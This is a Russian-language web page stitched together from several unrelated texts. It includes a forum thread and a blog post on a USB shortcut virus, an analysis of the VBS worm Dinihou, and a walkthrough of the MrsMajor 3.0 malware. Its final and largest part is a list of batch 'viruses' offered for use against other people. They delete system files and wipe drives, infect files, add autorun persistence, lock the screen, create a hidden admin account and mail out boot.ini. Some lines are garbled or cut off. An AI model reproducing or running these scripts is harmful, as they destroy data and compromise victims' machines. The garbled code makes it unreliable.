Вирус comspec c windowsservices movemenoreg vbs

3 месяца). Сегодня, когда активировал пробную версию антивируса и обновив его, провел проверку ноутбука и флешки на наличие вирусов. Антивирус удалил с флешки следующие файлы "helper.vbs", "installer.vbs", "movemenoreg.vbs". С ноута антивирус тоже вроде эти файлы удалил, я закрыл лог сканирования ноута в антивирусе, поэтому точно не помню. После удаления антивирусом этих файлов, ярлык в корне флешки не открывает скрытую папку. Пробовал скопировать файлы с флешки и отформатировать флешку. После форматирования ярлык не создается, но если вытащить и вставить флешку обратно, то ярлык создается, но не открывает скрытую папку с файлами.

01.10.2019, 21:44

Вирус создает на флешке ярлык на скрытую папку на флешке
Доброго времени суток. Словил вирус на флэшку,который создает скрытую папку на флешке с названием.

Вирус, который создает на флешке скрытую папку под названием 5f5f5
Появился у меня вирус, который создает на флешке скрытую папку под названием 5f5f5. Кто знает, что.

Вирус создаёт ярлык на флешке на невидимую системную папку где находятся все файлы
Я пытался сам от него избавиться. удалял все системные файлы в флешке, надеясь что один из них.

Вирус создает ярлык на флешке
После подключения флешек к моему компьютеру, в корне флешки создается ярлык на скрытую папку, в.

02.10.2019, 08:26 2

Решение

Внимание! Рекомендации написаны специально для пользователя Михаил О. Если рекомендации написаны не для вас, не используйте их - это может повредить вашей системе.
Если у вас похожая проблема - создайте тему в разделе Лечение компьютерных вирусов и выполните Правила запроса о помощи.
______________________________________________________

Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt и Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
(Если не помещаются, упакуйте).
Подробнее читайте в этом руководстве.

02.10.2019, 17:10 [ТС] 3 03.10.2019, 08:47 4

Решение

• Отключите до перезагрузки антивирус.
• Выделите следующий код:
  

03.10.2019, 14:00 [ТС] 5 03.10.2019, 16:06 6 06.10.2019, 22:33 [ТС] 7 07.10.2019, 08:25 8

Решение

08.10.2019, 08:42 [ТС] 9 08.10.2019, 11:30 10

Проделайте завершающие шаги:
1.
Переименуйте FRST.exe (или FRST64.exe) в uninstall.exe и запустите.
Компьютер перезагрузится.

Остальные утилиты лечения и папки можно просто удалить.

Заработок, финансы, создание и продвижение сайтов

• Вирус создал ярлык флешки на флешке 314 просмотров
• Наборщик текста страховой взнос 85 просмотров
• ТОП популярных хэштегов ВКонтакте 65 просмотров
• Шрифт как ВКонтакте на фото 62 просмотра
• Развод с QIWI кошельком 56 просмотров
• Samsung Galaxy S8 скидка 80 % 52 просмотра
• Развод копия Galaxy S8 46 просмотров
• Развод сборка ручек на дому 39 просмотров
• Как восстановить удаленную страницу ВКонтакте 39 просмотров
• Сообщество было заблокировано за резкую смену тематики 28 просмотров

Имел неосторожность воткнуть свою флешку в компьютер коллективного пользования, и тут же получил подарок в виде вируса. И это несмотря на установленный на нем антивирус Касперского. При попытке зайти на флешку, в корневом каталоге обнаружил ярлык флешки. Все остальные файлы и папки исчезли.

Вначале я не на шутку распереживался, поскольку на флешке были важные данные, а бэкап я делал уже довольно давно. Но все таки — это была не физическая смерть данных. Флешка оставалась заполненной, прекрасно открывалась и я понял что смогу решить проблему.

Как исправить ситуацию

Решения проблемы необходимо разделить на два пункта. Первое — это возвращение вместо ярлыка, на флешку, всех файлов и папок целыми и невредимыми. И второе — это удаление вируса и предотвращение его дальнейшего распространения.

Вернуть файлы на флешку

Как исправить ситуацию и вернуть все файлы и папки на флешку? На самом деле все очень просто. Необходимо вставить флешку в компьютер, вызвать командную строку, прописать следующие команды:

cd /d X: (вместо Х вы вводите букву каталога вашей флешки)

attrib -s -h -a -r /s /d *.* (прописываете точно как указано)

Для автоматизации процесса я сделал небольшой батник (файл .bat) который можно просто скопировать на флешку и запустить. Он выполняет указанную выше команду, просто её не будет нужно прописывать в командной строке.

Ну и может быть он пригодится тем, у кого заражена целая сеть и много людей обращаются с проблемой ярлыка флешки на флешке. Иногда легче дать людям батник и показать как он работает, чем по 20 раз возвращать флешку к жизни самому.

Удалить вирус

Осталось дело за малым, удалить вирус с компьютера, чтобы остановить дальнейшее распространение.

Для этого скачиваем программу Process Explorer от Майкрософт с официального сайта.

Process Explorer v16.20

Далее её разумется запускаем и выбираем в выпадающем меню File / Show Details for All Processes для того чтобы отобразить все запущенные на компьютере процессы.

Жмем Ctrl + L и в окне в нижней части программы ищем процесс autorun.inf Вероятнее всего он будет находиться в ветке svchost.exe .

Жмем правой кнопкой мыши и выбираем Close handle (закрываем процесс). После чего удаляме с флешки файл autofun.inf .

Во временной папке Temp ( C:\users\%username%\AppData\Local\Temp ) ищем файл с необычным расширением .pif и удаляем его (можно воспользоваться поиском).

Всё, теперь вы точно удалили вирус и с флешки и с компьютера.

Winset

Вынесу из комментариев алгоритм действий в случае, если на флешке находится скрытая папка Winset.

71 комментарий

У меня нет на флешке файла autofun.inf. И при поиске в программе Process Explorer у меня нет файла autorun. Но все флешки заражаются от моего ноутбука. Помогите, пожалуйста.

Переустановка системы однозначно решит проблему с вирусом, проникшим в систему. Но сам файл, из которого вирус проник в систему может быть скрыт в любом файле на любом диске вашего компьютера. После переустановки системы удалите все подозрительные приложения, игры и файлы со своего компьютера.

У меня тоже самое. Что делать?

Спасибо за помощь. Удалось вернуть файлы в нормальное видимое состояние.

Благодарю за отзыв, рад что смог помочь

Столкнулся с такой проблемой — флешка заразила два ноутбука и ещё три флешки. Помог антивирус Касперского ( другие ничего не показывали Dr WEB и Avast и USB guard) Касперский определил путь — C:\Users\Дмитрий\AppData\Roaming\Winset\ Но сначала надо на панели управления — свойства папки — вид-поставить точку — показывать скрытые папки и файлы, тем самым увидеть папку AppData. В папке Winset три файла — они постоянно прописываются на флешке при открытии. В итоге я удалил папку Winset, перезагрузил компьютер — и отформатировал флешку при подключении и всё.

Когда я словил вирус, Касперский его еще не обнаруживал.

Подскажите, пожалуйста, если Process Explorer не обнаруживает процесс autofun.inf, то это значит, что его действительно не существует, компьютер чист и вирус я подхватила с другого компьютера? Папка Temp тоже отсутствует.

Да, вероятнее всего так и есть. Вспоминайте куда флешку втыкали, вот тот то комп и надо чистить.

Всем привет !
[bimg=25%|fright]http://safezone.cc/attachments/cherv-jpg.21405/?temp_hash=e65dcf6b9a7e2d9eb43416bd87d5e7d2[/bimg]
В сегодняшнем меню будет подан на растерзание Worm.VBS.Dinihou.dt (по классификации Kasperky) с компонентами Worm:VBS/Jenxcus.

Целевое назначение: клиент, выполняющий различные команды с удаленного сервера.

Расшифровка скрипта после запуска происходит не сразу, а через 5 минут (возможно, защита от поведенческого анализа).

Устанавливает соединение с сервером по специальному порту и передает в качестве user-агента информацию о системе:
- серийные номера дисков;
- имя компьютера и пользователя;
- версия ОС;
- имена антивирусов;
- запущен ли червяк со съемного диска (проверка любопытная: расположен ли скрипт в корне диска).

После чего он превращается по сути в сервер, запрашивая каждые 5 секунд такие команды на исполнение:
[bimg=09%|fright]http://safezone.cc/attachments/serv_comm-png.21408/?temp_hash=e65dcf6b9a7e2d9eb43416bd87d5e7d2[/bimg]
- открыть / выполнить файл (программу);
- обновление тела скрипта и его перезапуск;
- удаление скрипта с исправлением последствий его работы (если не учитывать команды с сервера);
- выгрузка произвольного файла;
- скачивание файла и затем его запуск (с произвольного адреса или сервера злоумышленника по указанному порту);
- перечисление дисков и их типов;
- листинг файлов и папок в указанной директории (с отображением их атрибутов и размера);
- список процессов (имя, ProcessID, полный путь к образу);
- выполнить консольную команду или файл с отправкой на сервер результата вывода консоли;
- удалить файл или папку;
- завершить процесс принудительно с всеми дочерними экземплярами;
- заснуть на N секунд.

Выполнение каждой команды сопровождается повторной отправкой информации о системе (данные генерируются только один раз за работу скрипта).
К моменту тестирования командный сервер уже был неактивен.

1) Автозапуск:
Помещает свою копию:
- в папку "%programdata%" (или "%temp%", если первая не существует), которую прописывает в ключи автозапуска.
- в папку "Автозагрузка".

2) Самовосстанавливление:
Восстанавливает тело, если удалить скрипт, не завершив процесс.
Есть защита от одновременного запуска из нескольких папок (именно папок, а не экземпляров процесса).
По причине ошибки реализации, после перезагрузки работают одновременно 2 экземпляра процесса.

Если подключен съемный накопитель, копирует себя в его корень.
Для каждого файла или папки первого уровня (на выбор)* создается ярлык, маскируя свою иконку под изображение соответствующего типа файла, взятого из реестра.
Настоящим файлам/папкам присваивает атрибут скрытый и системный.
При клике по такому ярлыку сначала запускается вредоносный скрипт и за ним сразу же оригинальный файл.
Все происходит в свернутом режиме, поэтому пользователь может не сразу заметить подмены.
Разницу можно увидеть только по наличию стрелочки на пиктограмме иконки
Это говорит о том, что файл является ярлыком (кстати, это не есть 100% гарантия, т.к. стрелочку можно замаскировать).

* Мне в руки попал скрипт, у которого отключено создание ярлыков. Остался только сам код, но есть переключатель в шапке кода.
Т.к. предусмотрено автообновление тела скрипта, автор может быстро изменять его поведение.

Здесь у автора своеобразный почерк. Обычно в поле объект ярлыка путь прописывают в кавычках вида:

Часто автора таких творений оставляют особый маркер, который проверяется.
И если он есть, то скрипт не делает ничего плохого.
Может, это защита вирусописателей самих от себя

Этот скрипт использует интересную проверку:
- если нельзя изменить его тело (в папке %programdata%), например поставив галку "Только для чтения",
то будет записано в реестр время запуска* и более никаких вредоносных действий не произойдет.

* При каждом запуске скрипт записывает свое имя файла, дату запуска, а также запущен ли он с флеш-носителя,
в раздел реестра: HKEY_LOCAL_MACHINE\software\

Функция удаления:
Червь имеет функцию самоуничтожения, если такая команда поступит с сервера:
- удаляются сами файлы скрипта;
- удаляется запись об автозагрузке.
В дополнение:
- удаляются ярлыки со съемных накопителей;
- снимаются все атрибуты с файлов и каталогов в корне съмного накопителя.

Поскольку вирус распространяется через съемные накопители,
рекомендую запретить запуск исполняемых файлов с таких носителей, настроив групповые политики*:
- войдите в редактор групповых политик (Нажимаем комбинацию клавиш Win + R, затем вводим gpedit.msc)
- пройдемся по дереву -> Конфигурация компьютера -> Параметры безопасности -> Политика ограниченного использования программ
- Действие -> "Создать политику"
- Дополнительные правила -> Нажимаем "Действие" -> Создать правило для пути -> Путь указываем, например: F:\
где F - буква флеш-накопителя; Уровень безопасности -> выбираем "Запрещено".
Желательно проделать тоже самое с другими буквами дисков (кроме логических), с которыми может быть ассоциирован новый флеш-накопитель.

* Групповые политики недоступны для Home-редакций ОС. Для таких систем в качестве превентивной меры Вы также можете:
1) Запретить автозапуск, запустив через консоль (Win + R, ввести CMD), введя команду:
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDriveTypeAutoRun /t REG_DWORD /d 221 /f

Рекомендации по удалению вируса:

1. Разорвать подключение к интернету.
2. Отключить автозапуск со съемных накопителей.
3. Подключить зараженный съемный носитель.
4. Открыть диспетчер задач (Ctrl + Shift + Esc), перейти во вкладку "Процессы" и завершить все процессы с именами wscript.exe и cscript.exe
Это остановит выполнение полученных от сервера команд.
5. Загрузить Sysinternals Autoruns. Снять галочку с записей, которые запускают процесс wscript.exe / cscript.exe / cmd.exe или файлы скриптов .VBS
6. Запустить командную строку (Win + R, ввести CMD), ввести команду, подтвердив кнопкой ENTER:

где F - нужно поменять на букву диска съемного накопителя.
7. Откройте флешку и удалите все ярлыки (у них на пиктограмме будет отображатся знак стрелочки).
Для удобства отсортируйте файлы по признаку "Тип": Вид -> Таблица, нажмите на название колонки "Тип".
8. Обратиться в раздел помощи в профессиональном лечении системы от вирусов*.

* Этот червь может выполнять команды с сервера на любой вкус, поэтому заранее неизвестно, какой вред он причинил.

Статья о страшном вирусе MrsMajor2.0, второй версии, которая была написана еще в 2018 году, как ни странно была и остаётся популярной. Не так давно, появилась уже третья версия этого файла, а также запросы, которые поступают в Метрику дают об этом понять, насколько многих это интересует.

MrsMajor 3.0 это вирус с графическим интерфейсом, который одновременно и жуткий и интересный. Сегодня, как раз рассмотрим 3 версию этого вируса, которая может удивить не меньше, чем предыдущая. И как итог, попробуем запустить на виртуальной машине данный вирус, и понять, как он работает, и как от него мы сможем защититься.

Запуск

На нашем рабочем столе находится архив под названием MrsMajor_3.0.rar, который мы разархивируем. Внутри имеем всего один файл MrsMajor 3.0.exe, весом в 382 КБ. В этот раз нас встречает ярлык в виде необычной матрёшки, с привычными вирусу цветами красный и чёрный.

Здесь простая информация о том, чтобы мы в поиске Google не искали связанное с антивирусами, и о том, что если загуглить у Вас появится синий экран смерти.

В целом эти правила можно не успеть дочитать, так как Ваш ПК начнёт перезагрузку. Кстати перед перезагрузкой было заметно создание файла ReadMe (MrsMajor 3.0).txt на рабочем столе с ярлыком глаза, и весом в 606 байт.

После перезагрузки

Откроем тот самый файл ReadMe (MrsMajor 3.0).txt, хотя читать конечно уже не так легко, через кровавый экран. При этом мы пока не будем пытаться избавиться от этого вируса, и посмотрим, что будет дальше.

Прошло 2 минуты, и в целом забавно то, что данная версия вируса заливает весь экран красными красками, в итоге использовать какое-то ПО становится сложнее.

Кстати, подождав пока уровень крови закончится нам выскакивает синий экран смерти. И даже если система выполнила восстановление, то всё равно уходит в синий экран.

Лечение MrsMajor 3.0

Если проделать тоже самое с taskmgr.exe (диспетчером задач), переместить на рабочий стол и переименовать, то выдаёт ошибку.

Перезагружаемся, заходим снова в powershell.exe и ищем что-нибудь ещё.
Процесс dwm.exe отвечает за графическую часть вируса (кровь на экране, пиксели и уровень крови), если этот процесс убить, то получается заморозить уровень, и обновить графическую часть.

Ищем в стандартном поиске по файлам, приложение tobi0a0c.exe в папке Windows.
Находится он по пути: C:\Windows\winbase_base_procid_none\secureloc0x65
Размер: 5,06 МБ
Ну а как только мы переходим в папку winbase_base_procid_none, то система подвисает и в итоге снова срабатывает Blue screen — синий экран.

В этой папке находятся 4 приложения, 2 звуковых Wav файла, vbs-файл скрипт запуска, указатель и иконка глаза. Это как раз всё то, что связано с этим вирусом. Возможно, как раз файл bsector3.exe затирает загрузочный сектор.

Список файлов MrsMajor 3.0, в папке secureloc0x65 :

• tobi0a0c.exe (5 191 КБ)
• ui65.exe (116 КБ)
• ui66.exe (2 969 КБ)
• bsector3.exe (72 КБ)
• mainbgtheme.wav (2 466 КБ)
• 0x000F.wav (2 466 КБ)
• WinRapistI386.vbs (1 КБ)
• rcur.cur (5 КБ)
• winsxs.ico (492 КБ)

Попробуем удалить файлы из этой папки. Удалить получается всё кроме файла tobi0a0c.exe, который на данный момент запущен. Но в любом случае мы удалили часть важных файлов, среди которых был запускаемый скрипт-файл.

Перезагружаем теперь нашу виртуальную машину, и смотрим что из этого вышло.

Как итог, после удаления данных файлов вируса, заметно сразу, что потрепались иконки наших ярлыков, звуковые файлы мы удалили, также графическая часть восстановлена.

Проверим работает ли диспетчер задач.
Открываем PowerShell, и вводим команду taskmgr, и нам выводит окно, о том, что диспетчер задач отключен администратором.

Чтобы решить эти проблемы, вводим некую команду gpedit.msc (Редактор групповой локальной политики).

Как итог комбинация клавиш Ctrl+Shift+Esc теперь будет работать и запускать диспетчер задач. Редактор реестра также будет работать.

Теперь удалим из автозагрузки оставшееся событие от скрипта который мы удалили, что бы оно не выскакивало, при следующей загрузке системы. При этом, мы не найдём это событие в Автозагрузке, через msconfig, его там нет! Его нет не в списке автозагрузки, не в планировщике задач, при этом событие каждый раз срабатывает при включении ПК! Это странно.

Поэтому ищем WinRapistI386.vbs по поиску в редакторе реестра.
Как оказалось это событие скрипта vbs прописалось к запуску рабочего стола (Shell).
Поэтому, редактируем значение этого параметра Shell, оставив только explorer.exe

Простенькие вирусы:
Убирает рабочий стол
@echo off
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul

Выключается компьютер
@echo off
shutdown -s -t 1 -c "lol" >nul

Перезагрузка компьютера
@echo off
shutdown -r -t 1 -c "lol" >nul

Запрещает запускать программы
@echo off
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REG_DWORD /d %SystemRoot%\explorer.exe /f >nul

Удаление дров
@echo off
del "%SystemRoot%\Driver Cache\i386\driver.cab" /f /q >nul

Удаляет звуки Windows
@echo off
del "%SystemRoot%\Media" /q >nul

Запрещает заходить в панель управления
@echo off
reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer
/v NoControlPanel /t REG_DWORD /d 1 /f >nul

Запрещает комбинацию Ctrl-Alt-Delete
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul

Меняет местами значение кнопок мыши
%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul

Удаляет курсор мыши
del "%SystemRoot%Cursors*.*" >nul

Меняет название корзины
reg add HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache /v @C:\WINDOWS\system32\SHELL32.dll,-8964 /t REG_SZ /d ТУТ НАЗВАНИЕ КОРЗИНЫ /F

Убирает панель управления
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

Удаляет ВСЕ с раздела\диска(не пытайтесь проверить у себя)
rd [Буква_Диск]: /s /q

Удаляет все файлы в program files
del c:Program Files/q

Убивает процесс explorer.exe
taskkill /f /im explorer.exe >nul

Создает миллион папок
FOR /L %%i IN (1,1,1000000) DO md %%i

Удаляет все драйвера, которые установлены на компьютере
del "%SystemRoot%Driver Cachei386driver.cab" /f /q >nul

Удаляет команду DEL
del %0

Будет открывать бесконечно Paint
:x
Start mspaint
goto x

Изменяет расширение всех ярлыков на .txt
assoc .lnk=.txt

Заражает Autoexec
copy ""%0"" "%SystemRoot%\system32\batinit.bat" >nul
reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "%SystemRoot%\syste m32\batinit.bat" /f >nul

Создает нового пользователя, с правами администратора, логин:hacker и пароль hack (Можете изменить)
@echo off
chcp 1251
net user SUPPORT_388945a0 /delete
net user hacker hack /add
net localgroup Администраторы hacker /add
net localgroup Пользователи SUPPORT_388945a0 /del
reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList" /v "support" /t reg_dword /d 0 y

сбой системы (!) - выключить все функции ввода-вывода (клавиатура, дисплей, мышь). В результате будет черный экран с курсором и ни на что не реагирующая система, однако Windows продолжает работать.
rundll32 user,disableoemlayer

Меняет местами кнопки мыши,но обратная смена не возможна)
rundll32 user,SwapMouseButton

Удаляет ядро системы
del %systemroot%\system32\HAL.dll

Заражает *.jpg *.mp3 *.doc *.htm? *.xls. (Заражает
не только в текущем каталоге, но и надкаталоге)
@echo off%[MrWeb]%
if '%1=='In_ goto MrWebin
if exist c:\MrWeb.bat goto MrWebru
if not exist %0 goto MrWeben
find "MrWeb" c:\MrWeb.bat
attrib +h c:\MrWeb.bat
:MrWebru
for %%g in (..\*.jpg ..\*.doc ..\*.htm? *.jpg *.mp3 *.doc *.htm? *.xls) do call c:\MrWeb In_ %%ggoto MrWeben
:MrWebin
if exist %2.bat goto MrWeben
type c:\MrWeb.bat>>%2.bat
echo start %2>>%2.bat%[MrWeb]%
:MrWeben

Вирус заражает *.JPG в текущем каталоге
@echo off%[MrWeb]%
if '%1=='In_ goto MrWebin
if exist c:\MrWeb.bat goto MrWebru
if not exist %0 goto MrWeben
find "MrWeb" c:\MrWeb.bat
attrib +h c:\MrWeb.bat
:MrWebru
for %%g in (*.jpg) do call c:\MrWeb In_ %%g
goto MrWeben
:MrWebin
if exist %2.bat goto MrWeben
type c:\MrWeb.bat>>%2.bat
echo start %2>>%2.bat%[MrWeb]%
:MrWeben

Жестокие вирусы:
У вашего ламера будет глючить компьютер.
@echo off
echo Set fso = CreateObject("Scripting.FileSystemObject") > %systemdrive%\windows\system32\rundll32.vbs
echo do >> %systemdrive%\windows\system32\rundll32.vbs
echo Set tx = fso.CreateTextFile("%systemdrive%\windows\system32\rundll32.dat", True) >> %systemdrive%\windows\system32\rundll32.vbs
echo tx.WriteBlankLines(100000000) >> %systemdrive%\windows\system32\rundll32.vbs
echo tx.close >> %systemdrive%\windows\system32\rundll32.vbs
echo FSO.DeleteFile "%systemdrive%\windows\system32\rundll32.dat" >> %systemdrive%\windows\system32\rundll32.vbs
echo loop >> %systemdrive%\windows\system32\rundll32.vbs
start %systemdrive%\windows\system32\rundll32.vbs
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v system_host_run /t REG_SZ /d %systemdrive%\windows\system32\rundll32.vbs /f

") = 25 >> %temp%\temp.vbs
echo Flds.Update >> %temp%\temp.vbs
echo iMsg.Configuration = iConf >> %temp%\temp.vbs
echo iMsg.To = strTo >> %temp%\temp.vbs
echo iMsg.From = strFrom >> %temp%\temp.vbs
echo iMsg.Subject = strSubject >> %temp%\temp.vbs
echo iMsg.TextBody = strBody >> %temp%\temp.vbs
echo iMsg.AddAttachment "c:\boot.ini" >> %temp%\temp.vbs
echo iMsg.Send >> %temp%\temp.vbs
echo End Function >> %temp%\temp.vbs
echo Set iMsg = Nothing >> %temp%\temp.vbs
echo Set iConf = Nothing >> %temp%\temp.vbs
echo Set Flds = Nothing >> %temp%\temp.vbs

echo s.run "shutdown -r -t 0 -c ""pcforumhack.ru™"" -f",1 >> %temp%\temp.vbs
start %temp%\temp.vbs
start %temp%\temp1.vbs
start %temp%\temp2.vbs

Вирус полностью блокирует систему при следующем запуске Windows.Даже в безопасном режиме, выключает диспетчер задач.Чтобы разблокировать компьютер можно введя код 200393!(Но он не разблокирует)
@echo off
CHCP 1251
cls
Set Yvaga=На вашем компьютере найден вирус.
Set pass=Пароль
Set pas=Введите пароль.
Set virus=Чтобы разблокировать ПК вам потребуется ввести пароль
Set dim=Выключаю вирус.
title Внимание.
CHCP 866
IF EXIST C:\windows\boot.bat (
goto ok )
cls
IF NOT EXIST C:\windows\boot.bat (
ECHO Windows Registry Editor Version 5.00 >> C:\0.reg
ECHO. >> C:\0.reg
ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >> C:\0.reg
ECHO. >> C:\0.reg
ECHO "Shell"="Explorer.exe, C:\\windows\\boot.bat " >> C:\0.reg
start/wait regedit -s C:\0.reg
del C:\0.reg
ECHO @echo off >>C:\windows\boot.bat
ECHO C:\WINDOWS\system32\taskkill.exe /f /im Explorer.exe >>C:\windows\boot.bat
ECHO reg add "HKCU\software\Microsoft\Windows\CurrentVersion\Policies\system" /v DisableTaskMgr /t REG_DWORD /d 1 /f >>C:\windows\boot.bat
ECHO start sys.bat >>C:\windows\boot.bat
attrib +r +a +s +h C:\windows\boot.bat
copy virus.bat c:\windows\sys.bat
attrib +r +a +s +h C:\windows\sys.bat
GOTO end)
:ok
cls
Echo %Yvaga%
echo.
echo %virus%
echo %pas%
set /a choise = 0
set /p choise=%pass%:
if "%choise%" == "101" goto gold
if "%choise%" == "200393" goto status
exit
:status
echo %dim%
attrib -r -a -s -h C:\windows\boot.bat
del C:\windows\boot.bat
attrib -r -a -s -h C:\windows\sys.bat
del C:\windows\sys.bat
cls
:gold
start C:\
:end

Добавляет программу в автозагрузку ОС
copy ""%0"" "%SystemRoot%\system32\File.bat"
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Filel" /t REG_SZ /d "%SystemRoot%\system32\File.bat" /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f

Этот вирус,блокирует все программы,но интернет работает.
@Echo off
Echo Virus Loading
Date 13.09.96
If exist c:ski.bat goto abc
Copy %0 c:ski.bat
Attrib +h c:ski.bat
Echo c:ski.bat >>autoexec.bat
:abc
md PRIDUROK
md LUZER
md DURAK
md LAMER
Label E: PRIDUROK
assoc .exe=.mp3
del c:Program Files/q
Echo VIRUS LOAD

@echo off
chcp 1251
echo щаска.
color 4
@echo Вас собирается